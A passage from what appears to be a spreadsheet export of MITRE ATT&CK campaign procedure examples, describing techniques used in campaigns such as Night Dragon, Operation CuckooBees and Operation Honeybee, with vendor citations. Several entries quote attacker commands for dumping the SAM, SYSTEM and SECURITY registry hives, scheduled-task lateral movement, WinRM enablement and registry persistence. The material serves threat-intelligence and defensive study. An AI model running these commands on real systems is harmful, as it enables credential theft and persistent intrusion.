    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to obtain the compromised machine's name.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to find the public IP address of a compromised system.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to enumerate hosts and gather username, machine name, and administrative permissions information.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>For [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors obtained and used [Empire](https://attack.mitre.org/software/S0363).(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used HTTP GET requests for C2.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors ran a command script to set up persistence as a scheduled task named "WinUpdate", as well as other encoded commands from the command-line (Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used 7zr.exe to add collected files to an archive.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors registered a variety of domains.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors likely established an identified email account to register a variety of domains that were used during the campaign.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors downloaded additional droppers and backdoors onto a compromised system.(Citation: Bitdefender FunnyDream Campaign November 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a new backdoor named [FunnyDream](https://attack.mitre.org/software/S1044).(Citation: Bitdefender FunnyDream Campaign November 2020) </t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [Tasklist](https://attack.mitre.org/software/S0057) on targeted systems.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used several tools and batch files to map victims' internal networks.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [Systeminfo](https://attack.mitre.org/software/S0096) to collect information on targeted hosts.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [ipconfig](https://attack.mitre.org/software/S0100) for discovery on remote systems.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [netstat](https://attack.mitre.org/software/S0104) to discover network connections on remote systems.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a modified version of the open source [PcShare](https://attack.mitre.org/software/S1050) remote administration tool.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a Visual Basic script to run remote commands.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used `cmd.exe` to execute the wmiexec.vbs script.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used `wmiexec.vbs` to run remote commands.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), the threat actors collected files and other data from compromised systems.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors disabled anti-virus and anti-spyware tools in some instances on the victim’s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used domain accounts to gain further access to victim systems.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used dynamic DNS services for C2.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used SQL injection exploits against extranet web servers to gain access.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used compromised VPN accounts to gain access to victim systems.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used company extranet servers as secondary C2 servers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and browse the victim file system.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used administrative utilities to deliver Trojan components to remote systems.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used RAT malware to exfiltrate email archives.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors enticed users to click on links in spearphishing emails to download malware.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used Trojans from underground hacker websites.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and manipulate the Registry.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used a DLL that included an XOR-encoded section.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used pass-the-hash tools to obtain authenticated access to sensitive internal desktops and servers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used Cain &amp; Abel to crack password hashes.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used several remote administration tools as persistent infiltration channels.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors copied files to company web servers and subsequently downloaded them.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors dumped account hashes using [gsecdump](https://attack.mitre.org/software/S0008).(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors compromised web servers to use for C2.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors purchased hosted services to use for C2.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used software packing in its tools.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used password cracking and pass-the-hash tools to discover usernames and passwords.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors obtained and used tools such as [gsecdump](https://attack.mitre.org/software/S0008).(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors uploaded commonly available hacker tools to compromised web servers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used HTTP for C2.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and run command-line shells.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors collected data, files, and other information from compromised networks.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `dsquery` and `dsget` commands to get domain environment information and to query users in administrative groups.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used compromised domain administrator credentials as part of their lateral movement.(Citation: Cybereason OperationCuckooBees May 2022) </t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors exploited multiple vulnerabilities in externally facing servers.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo "C:\Windows\System32\winrm.vbs" set winrm/config/service@{EnableCompatibilityHttpsListener="true"}`.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used `dir c:\\` to search for files.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), attackers used a signed kernel rootkit to establish additional persistence.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net user` command to gather account information.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net group` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net share` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors executed an encoded VBScript file.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net accounts` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `fsutil fsinfo drives` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `tasklist` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used scheduled tasks to execute batch scripts for lateral movement with the following command: `SCHTASKS /Create /S &lt;IP Address&gt; /U &lt;Username&gt; /p &lt;Password&gt; /SC ONCE /TN test /TR &lt;Path to a Batch File&gt; /ST &lt;Time&gt; /RU SYSTEM.`(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\SYSTEM system.hiv`, `reg save HKLM\\SAM sam.hiv`, and `reg save HKLM\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `systeminfo` command to gather details about a compromised system.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net session`, `net use`, and `netstat` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net start` command as part of their initial reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net time` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors obtained publicly-available JSP code that was used to deploy a webshell onto a compromised server.(Citation: Cybereason OperationCuckooBees May 2022)   </t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors enabled HTTP and HTTPS listeners.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors generated a web shell within a vulnerable Enterprise Resource Planning Web Application Server as a persistence mechanism.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used batch scripts to perform reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), attackers used VBS code to decode payloads.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors established domains as part of their operational infrastructure.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used dynamic DNS domains from a variety of free providers, including No-IP, Oray, and 3322.(Citation: Cylance Dust Storm) </t>
  </si>
  <si>
    <t>For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors established email addresses to register domains for their operations.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used JavaScript code.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors relied on potential victims to open a malicious Microsoft Word document sent via email.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors relied on a victim clicking on a malicious link sent via email.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors disguised some executables as JPG files.(Citation: Cylance Dust Storm) </t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors executed JavaScript code via `mshta.exe`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors encoded some payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key; other payloads were Base64-encoded.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used UPX to pack some payloads.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors sent spearphishing emails that contained a malicious Microsoft Word document.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors sent spearphishing emails containing a malicious link.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Visual Basic scripts.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors uses zip to pack collected files before exfiltration.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used the malicious NTWDBLIB.DLL and `cliconfig.exe` to bypass UAC protections.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors collected data from compromised hosts.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), malicious files were decoded prior to execution.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors stole a digital signature from Adobe Systems to use with their MaoCheng dropper.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors registered domains for C2.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), attackers created email addresses to register for a free account for a control server used for the implants.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors uploaded stolen files to their C2 servers.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors had the ability to use FTP for C2.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a malicious DLL to search for files with specific keywords.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors downloaded additional malware and malicious scripts onto a compromised host.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), stolen data was copied into a text file using the format `From &lt;COMPUTER-NAME&gt; (&lt;Month&gt;-&lt;Day&gt; &lt;Hour&gt;-&lt;Minute&gt;-&lt;Second&gt;).txt` prior to compression, encoding, and exfiltration.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors relied on a victim to enable macros within a malicious Word document.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors modified the MaoCheng dropper so its icon appeared as a Word document.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used batch files that modified registry keys.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors deployed malware that used API calls, including `CreateProcessAsUser`.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used Base64 to encode files with a custom key.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors obtained a list of running processes on a victim machine using `cmd /c tasklist &gt; %temp%\temp.ini`.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used batch files that allowed them to establish persistence by adding the following Registry key: `"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f`.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), at least one identified persona was used to register for a free account for a control server.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors ran &lt;code&gt;sc start&lt;/code&gt; to start the COMSysApp as part of the service hijacking and &lt;code&gt;sc stop&lt;/code&gt; to stop and reconfigure the COMSysApp.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a batch file that modified the COMSysApp service to load a malicious ipnet.dll payload and to load a DLL into the `svchost.exe` process.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors collected the computer name, OS, and other system information using `cmd /c systeminfo &gt; %temp%\ temp.ini`.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a Visual Basic script embedded within a Word document to download an implant.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), various implants used batch scripting and `cmd.exe` for execution.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors installed DLLs and backdoors as Windows services.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors sent malicious Word OLE documents to victims.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), additional payloads were downloaded after a target was infected with a first-stage downloader.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors relied on victims executing malicious Microsoft Word or PDF files.(Citation: McAfee Sharpshooter December 2018) </t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used the [Rising Sun](https://attack.mitre.org/software/S0448) modular backdoor.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors installed [Rising Sun](https://attack.mitre.org/software/S0448) in the Startup folder and disguised it as `mssync.exe`.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the first stage downloader resolved various Windows libraries and APIs, including `LoadLibraryA()`, `GetProcAddress()`, and `CreateProcessA()`.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors leveraged embedded shellcode to inject a downloader into the memory of Word.(Citation: Threatpost New Op Sharpshooter Data March 2019)    </t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used the ExpressVPN service to hide their location.(Citation: Bleeping Computer Op Sharpshooter March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), a first-stage downloader installed [Rising Sun](https://attack.mitre.org/software/S0448) to `%Startup%\mssync.exe` on a compromised host.(Citation: McAfee Sharpshooter December 2018) </t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors compromised a server they used as part of the campaign's infrastructure.(Citation: Bleeping Computer Op Sharpshooter March 2019)</t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors staged malicious files on Dropbox and other websites.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used a VBA macro to execute a simple downloader that installed [Rising Sun](https://attack.mitre.org/software/S0448).(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used Dropbox to host lure documents and their first-stage downloader.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used Nullsoft Scriptable Install System (NSIS) scripts to install malware.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used a variety of packers and droppers to decrypt malicious payloads.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors registered hundreds of domains using Duck DNS and DNS Exit.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
